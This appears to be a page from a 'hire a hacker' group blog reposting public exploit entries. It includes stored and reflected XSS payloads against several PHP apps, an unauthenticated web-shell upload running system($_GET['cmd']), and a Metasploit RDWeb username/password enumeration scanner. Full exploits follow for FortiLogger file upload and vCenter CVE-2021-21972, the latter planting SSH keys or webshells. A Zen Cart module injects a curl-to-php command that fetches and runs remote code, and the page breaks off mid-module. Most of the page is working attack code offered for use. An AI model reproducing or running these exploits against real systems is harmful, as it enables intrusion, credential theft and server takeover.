Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153261

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
# Date: 2021-02-25
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
# Version: v1.0
# Tested on: Ubuntu


*Steps to Reproduce:*
1) Login with Admin Credentials and click on the '*Manage category*' button.
2) Click on the '*Add Categories*'  button.
3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
4) Now add the following payload input field of *Category *as a parameter name is *catename*

Payload:  ba1man"><script>alert(document.cookie)</script>

4) Click On Save
5) Now go to '*Manage category > View Categories*'
5) XSS payload is triggered.

*proof-of-concept:*
1) Request:

POST /lagos_parker/parker/addcategory.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lagos_parker/parker/addcategory.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Connection: close
Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
Upgrade-Insecure-Requests: 1
catename=ba1man"><script>alert(document.cookie)</script>&submit=
HireHackking 
# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
# Date: 2021-02-25
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

uploadID.php can be used to upload .php files to 
'/uploads/employees_ids/' without authentication.

POC
---

1) Make the following Request changing the "Host:" to your Victim IP.

POST /dashboard/uploadID.php HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 
Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; 
boundary=---------------------------5825462663702204104870787337
Content-Length: 267
DNT: 1
Connection: close

-----------------------------5825462663702204104870787337
Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"
Content-Type: image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------5825462663702204104870787337--


2) You will get the response with the name of the uploaded file 
(upload_filename).

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 25 Feb 2021 19:17:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77
{"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}

3) Your file will be located in: 
http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php

4) In this example, to run commands:
http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami
HireHackking 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
from metasploit import module

# extra modules
DEPENDENCIES_MISSING = False
try:
    import base64
    import itertools
    import os
    import requests
except ImportError:
    DEPENDENCIES_MISSING = True


# Metasploit Metadata
metadata = {
    'name': 'Microsoft RDP Web Client Login Enumeration',
    'description': '''
        Enumerate valid usernames and passwords against a Microsoft RDP Web Client
        by attempting authentication and performing a timing based check
        against the provided username.
    ''',
    'authors': [
        'Matthew Dunn'
    ],
    'date': '2020-12-23',
    'license': 'MSF_LICENSE',
    'references': [
        {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
    ],
    'type': 'single_scanner',
    'options': {
        'targeturi': {'type': 'string',
                      'description': 'The base path to the RDP Web Client install',
                      'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
        'rport': {'type': 'port', 'description': 'Port to target',
                  'required': True, 'default': 443},
        'domain': {'type': 'string', 'description': 'The target AD domain',
                   'required': False, 'default': None},
        'username': {'type': 'string',
                     'description': 'The username to verify or path to a file of usernames',
                     'required': True, 'default': None},
        'password': {'type': 'string',
                     'description': 'The password to try or path to a file of passwords',
                     'required': False, 'default': None},
        'timeout': {'type': 'int',
                    'description': 'Response timeout in milliseconds to consider username invalid',
                    'required': True, 'default': 1250},
        'enum_domain': {'type': 'bool',
                        'description': 'Automatically enumerate AD domain using NTLM',
                        'required': False, 'default': True},
        'verify_service': {'type': 'bool',
                           'description': 'Verify the service is up before performing login scan',
                           'required': False, 'default': True},
        'user_agent': {'type': 'string',
                       'description': 'User Agent string to use, defaults to Firefox',
                       'required': False,
                       'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
    }
}


def verify_service(rhost, rport, targeturi, timeout, user_agent):
    """Verify the service is up at the target URI within the specified timeout"""
    url = f'https://{rhost}:{rport}/{targeturi}'
    headers = {'Host':rhost,
               'User-Agent': user_agent}
    try:
        request = requests.get(url, headers=headers, timeout=(timeout / 1000),
                               verify=False, allow_redirects=False)
        return request.status_code == 200 and 'RDWeb' in request.text
    except requests.exceptions.Timeout:
        return False
    except Exception as exc:
        module.log(str(exc), level='error')
        return False


def get_ad_domain(rhost, rport, user_agent):
    """Retrieve the NTLM domain out of a specific challenge/response"""
    domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB',
                   'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc']
    headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==',
               'User-Agent': user_agent,
               'Host': rhost}
    session = requests.Session()
    for url in domain_urls:
        target_url = f"https://{rhost}:{rport}/{url}"
        request = session.get(target_url, headers=headers, verify=False)
        # Decode the provided NTLM Response to strip out the domain name
        if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \
          'NTLM' in request.headers['WWW-Authenticate']:
            domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0]
            domain = base64.b64decode(bytes(domain_hash,
                                            'utf-8')).replace(b'\x00',b'').split(b'\n')[1]
            domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8')
            module.log(f'Found Domain: {domain}', level='good')
            return domain
    module.log('Failed to find Domain', level='error')
    return None


def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent):
    """Check a single login against the RDWeb Client
    The timeout is used to specify the amount of milliseconds where a
    response should consider the username invalid."""

    url = f'https://{rhost}:{rport}/{targeturi}'
    body = f'DomainUserName={domain}%5C{username}&UserPass={password}'
    headers = {'Host':rhost,
               'User-Agent': user_agent,
               'Content-Type': 'application/x-www-form-urlencoded',
               'Content-Length': f'{len(body)}',
               'Origin': f'https://{rhost}'}
    session = requests.Session()
    report_data = {'domain':domain, 'address': rhost, 'port': rport,
                   'protocol': 'tcp', 'service_name':'RDWeb'}
    try:
        request = session.post(url, data=body, headers=headers,
                               timeout=(timeout / 1000), verify=False, allow_redirects=False)
        if request.status_code == 302:
            module.log(f'Login {domain}\\{username}:{password} is valid!', level='good')
            module.report_correct_password(username, password, **report_data)
        elif request.status_code == 200:
            module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds',
                       level='good')
            module.report_valid_username(username, **report_data)
        else:
            module.log(f'Received unknown response with status code: {request.status_code}')
    except requests.exceptions.Timeout:
        module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds',
                   level='error')
    except requests.exceptions.RequestException as exc:
        module.log('{}'.format(exc), level='error')
        return


def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent):
    """Check each username and password combination"""
    for (username, password) in list(itertools.product(usernames, passwords)):
        check_login(rhost, rport, targeturi, domain,
                    username.strip(), password.strip(), timeout, user_agent)

def run(args):
    """Run the module, gathering the domain if desired and verifying usernames and passwords"""
    module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS']))
    if DEPENDENCIES_MISSING:
        module.log('Module dependencies are missing, cannot continue', level='error')
        return

    user_agent = args['user_agent']
    # Verify the service is up if requested
    if args['verify_service']:
        service_verified = verify_service(args['RHOSTS'], args['rport'],
                                          args['targeturi'], int(args['timeout']), user_agent)
        if service_verified:
            module.log('Service is up, beginning scan...', level='good')
        else:
            module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds',
                       level='error')
            return

    # Gather AD Domain either from args or enumeration
    domain = args['domain'] if 'domain' in args else None
    if not domain and args['enum_domain']:
        domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent)

    # Verify we have a proper domain
    if not domain:
        module.log('Either domain or enum_domain must be set to continue, aborting...',
                   level='error')
        return

    # Gather usernames and passwords for enumeration
    if os.path.isfile(args['username']):
        with open(args['username'], 'r') as file_contents:
            usernames = file_contents.readlines()
    else:
        usernames = [args['username']]
    if 'password' in args and os.path.isfile(args['password']):
        with open(args['password'], 'r') as file_contents:
            passwords = file_contents.readlines()
    elif 'password' in args and args['password']:
        passwords = [args['password']]
    else:
        passwords = ['wrong']
    # Check each valid login combination
    check_logins(args['RHOSTS'], args['rport'], args['targeturi'],
                   domain, usernames, passwords, int(args['timeout']), user_agent)

if __name__ == '__main__':
    module.run(metadata, run)
HireHackking 
# Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS
# Date: 25/02/2021
# Exploit Author: Peithon
# Vendor Homepage: https://github.com/eddy8/LightCMS
# Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4
# Version: 1.3.4
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE: CVE-2021-3355

An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords.

--------------------------Proof of Concept-----------------------

1. Log in to the background.

2. Navigate to System -> `/admin/SensitiveWords/create` & add the below-shared payload as the exclusive field value. Payload - </span><img src=1 onerror=alert(1) /><span>

3. Visit page `/admin/SensitiveWords`, the payload will be triggered.
HireHackking

Triconsole 3.75 - Reflected XSS

HACKER · %s · %s

# Exploit Title: Triconsole 3.75 - Reflected XSS # Google Dork: inurl : /calendar/calendar_form.php # Date: 15/2/2021 # Exploit Author: Akash Chathoth # Vendor Homepage: http://www.triconsole.com/ # Software Link: http://www.triconsole.com/php/calendar_datepicker.php # Version: < 3.76 (14 February 2021) # Tested on: 3.75 # CVE: 2021-27330 # Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>
HireHackking
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'FortiLogger Arbitrary File Upload Exploit', 'Description' => %q{ This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. }, 'License' => MSF_LICENSE, 'Author' => [ 'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module ], 'References' => [ ['CVE', '2021-3378'], ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/'] ], 'Platform' => ['win'], 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'FortiLogger - 4.4.2.2', { 'Platform' => 'win' } ], ], 'DisclosureDate' => '2021-02-26', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000), OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']) ], self.class ) end def check_product_info res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), 'method' => 'POST', 'data' => '', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest' } ) return res end def check begin res = check_product_info if res && res.code == 200 if JSON.parse(res.body)['Version'] == '4.4.2.2' Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end end end def create_payload Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s end def exploit begin print_good('Generate Payload !') data = create_payload boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n" post_data << "Content-Type: image/png\r\n" post_data << "\r\n#{data}\r\n" post_data << "--#{boundary}\r\n" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data, 'headers' => { 'Accept' => 'application/json', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With' => 'XMLHttpRequest' } ) if res && res.code == 200 if JSON.parse(res.body)['Message'] == 'Error in saving file' print_error('Error for upload payload..') else print_good('Payload has been uploaded !') handler print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), 'method' => 'GET' }, 5) end end end end end
HireHackking

VMware vCenter Server 7.0 - Unauthenticated File Upload

HACKER · %s · %s

# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload # Date: 2021-02-27 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html # Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) # Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds # CVE: CVE-2021-21972 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-21972.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be CVE-2021-21972 is an unauthenticated file upload and overwrite, exploitation can be done via SSH public key upload or a webshell The webshell must be of type JSP, and its success depends heavily on the specific vCenter version # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister # A white page means vulnerable # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) # Notes: # * On Linux SSH key upload is always best, when SSH access is possible & enabled # * On Linux the upload is done as user vsphere-ui:users # * On Windows the upload is done as system user # * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui" # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: vulnerability checker + exploit ''' import os, tarfile, sys, optparse, requests requests.packages.urllib3.disable_warnings() lProxy = {} SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <env:Body> <RetrieveServiceContent xmlns="urn:vim25"> <_this type="ServiceInstance">ServiceInstance</_this> </RetrieveServiceContent> </env:Body> </env:Envelope>''' sURL = sFile = sRpath = sType = None def parseArguments(options): global sURL, sFile, sType, sRpath, lProxy if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') sURL = options.url if sURL[-1:] == '/': sURL = sURL[:-1] if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL sFile = options.file if not os.path.exists(sFile): exit('[-] File not found: ' + sFile) sType = 'ssh' if options.type: sType = options.type if options.rpath: sRpath = options.rpath else: sRpath = None if options.proxy: lProxy = {'https': options.proxy} def getVersion(sURL): def getValue(sResponse, sTag = 'vendor'): try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] except: pass return '' oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) #print(oResponse.text) if oResponse.status_code == 200: sResult = oResponse.text if not 'VMware' in getValue(sResult, 'vendor'): exit('[-] Not a VMware system: ' + sURL) else: sName = getValue(sResult, 'name') sVersion = getValue(sResult, 'version') # e.g. 7.0.0 sBuild = getValue(sResult, 'build') # e.g. 15934073 sFull = getValue(sResult, 'fullName') print('[+] Identified: ' + sFull) return sVersion, sBuild exit('[-] Not a VMware system: ' + sURL) def verify(sURL): #return True sURL += '/ui/vropspluginui/rest/services/uploadova' try: oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) except: exit('[-] System not available: ' + sURL) if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely else: return False def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): def getResourcePath(): oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) return oResponse.text.split('static/')[1].split('/')[0] oTar = tarfile.open('payloadLin.tar','w') if sRpath: ## version & build not important if sRpath[0] == '/': sRpath = sRpath[1:] sPayloadPath = '../../' + sRpath oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'absolute' elif sType.lower() == 'ssh': ## version & build not important sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'ssh' elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) oTar.close() return 'webshell' elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'backdoor' else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'backdoor' def createTarWin(sFile, sRpath = None): ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows if sRpath: if sRpath[0] == '/': sRpath = sRpath[:1] sPayloadPath = '../../' + sRpath else: sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) oTar = tarfile.open('payloadWin.tar','w') oTar.add(sFile, arcname=sPayloadPath) oTar.close() def uploadFile(sURL, sUploadType, sFile): #print('[!] Uploading ' + sFile) sFile = os.path.basename(sFile) sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} ## Linux oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) if oResponse.status_code == 200: if oResponse.text == 'SUCCESS': print('[+] Linux payload uploaded succesfully.') if sUploadType == 'ssh': print('[+] SSH key installed for user \'vsphere-ui\'.') print(' Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'') return True elif sUploadType == 'webshell': sWebshell = sURL + '/ui/resources/' + sFile #print('testing ' + sWebshell) oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) if oResponse.status_code != 404: print('[+] Webshell verified, please visit: ' + sWebshell) return True elif sUploadType == 'backdoor': sWebshell = sURL + '/ui/resources/' + sFile print('[+] Backdoor ready, please reboot or wait for a reboot') print(' then open: ' + sWebshell) else: ## absolute pass ## Windows arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) if oResponse.status_code == 200: if oResponse.text == 'SUCCESS': print('[+] Windows payload uploaded succesfully.') if sUploadType == 'backdoor': print('[+] Absolute upload looks OK') return True else: sWebshell = sURL + '/statsreport/' + sFile oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) if oResponse.status_code != 404: print('[+] Webshell verified, please visit: ' + sWebshell) return True return False if __name__ == "__main__": usage = ( 'Usage: %prog [option]\n' 'Exploiting Windows & Linux vCenter Server\n' 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n' 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n' 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') parser = optparse.OptionParser(usage=usage) parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') (options, args) = parser.parse_args() parseArguments(options) ## Verify if verify(sURL): print('[+] Target vulnerable: ' + sURL) else: exit('[-] Target not vulnerable: ' + sURL) ## Read out the version sVersion, sBuild = getVersion(sURL) if sRpath: print('[!] Ready to upload your file to ' + sRpath) elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'') else: print('[!] Ready to upload webshell \'' + sFile + '\'') sAns = input('[?] Want to exploit? [y/N]: ') if not sAns or not sAns[0].lower() == 'y': exit() ## Create TAR file sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) if not sUploadType == 'ssh': createTarWin(sFile, sRpath) ## Upload and verify uploadFile(sURL, sUploadType, sFile) ## Cleanup os.remove('payloadLin.tar') os.remove('payloadWin.tar')
HireHackking
# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: Praharsh Kumar Singh # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System # Version: 1.0 # Vulnerability Type: Cross-site Scripting # Vulnerability: Persistent/Stored XSS # Tested on: Parrot OS # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in adding questions in options parameter affected from this vulnerability. # payload: </script><script >alert(document.cookie)</script> POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1 Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh Upgrade-Insecure-Requests: 1 Sec-GPC: 1 qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c POC: # go to url http://localhost:8080/admin.php # login and add question # then put the above payload in MCQ options parameter # then fill the remaining details # then click add # go to url http://localhost:8080/login.php # then login to user account # then attempt the quiz while attempting the quiz xss pop up there..!
HireHackking

Zen Cart 1.5.7b - Remote Code Execution (Authenticated)

HACKER · %s · %s

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ### # # # This exploit write payload in database and trig to command # a bug in an zencart v1.5.7b web application # ### class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'zencart authenticated remote code execution exploit', 'Description' => %q( This exploit module execution os command in zencart. ), 'License' => MSF_LICENSE, 'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc 'References' =>[ [ 'OSVDB', '' ], [ 'EDB', '' ], [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'], [ 'CVE', '2021-3291'] ], 'Platform' => 'php', 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic', { }] ], 'DisclosureDate' => '2021-01-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ true, 'Password to login with', '']), OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']), OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']), OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']), OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/']) ], self.class ) end def start_server ssltut = false if datastore["SSL"] ssltut = true datastore["SSL"] = false end start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) print_status("payload is on #{get_uri}") @adresim = get_uri datastore['SSL'] = true if ssltut end def on_request_uri(cli, request) print_good('First stage is executed ! Sending 2nd stage of the payload') send_response(cli, payload.encoded, {'Content-Type'=>'text/html'}) end def tabanyol datastore["BASEPATH"] end def isim datastore["USERNAME"] end def parola datastore["PASSWORD"] end def login #"index.php?cmd=login&camefrom=index.php" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'login', 'camefrom' => 'index.php' }) # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" /> unless res fail_with(Failure::Unreachable, "Access web application failure") end if res.code != 200 fail_with(Failure::Unreachable, "we not have 200 response") end if !res.get_cookies.empty? @cookie = res.get_cookies @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || '' if @csrftoken.empty? fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') end vprint_good("login Csrf token: "+@csrftoken) end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"), 'cookie' => @cookie, 'vars_post' => { 'securityToken' => @csrftoken, 'action' => "do"+@csrftoken, 'admin_name' => isim, 'admin_pass' => parola }) if res.code != 302 fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.') end true end def check unless login fail_with(Failure::UnexpectedReply, 'Wrong credentials') return CheckCode::NotVulnerable('Wrong credentials') end print_good("We loged in") Exploit::CheckCode::Vulnerable CheckCode::Vulnerable('Authenticated successfully') end def exploit check start_server sleep(4) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'edit' }, 'cookie' => @cookie ) if res.code != 200 fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200') end # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" /> if res && res.code == 200 @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || '' if @formtoken.empty? fail_with(Failure::UnexpectedReply, 'securitytoken not in response') end #print_good(@formtoken) # <form name="modules" @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/) @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/) @textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/) @secme = {} @secme["securityToken"] = @formtoken for @a in @radiolar @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //" end for @a in @selectler @secme["configuration[#{@a[0]}]"] = "0" end for @a in @textarr @secme["configuration[#{@a[0]}]"] = "0" end print_good(@secme.to_s) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'cookie' => @cookie, 'vars_get' => { 'cmd' => 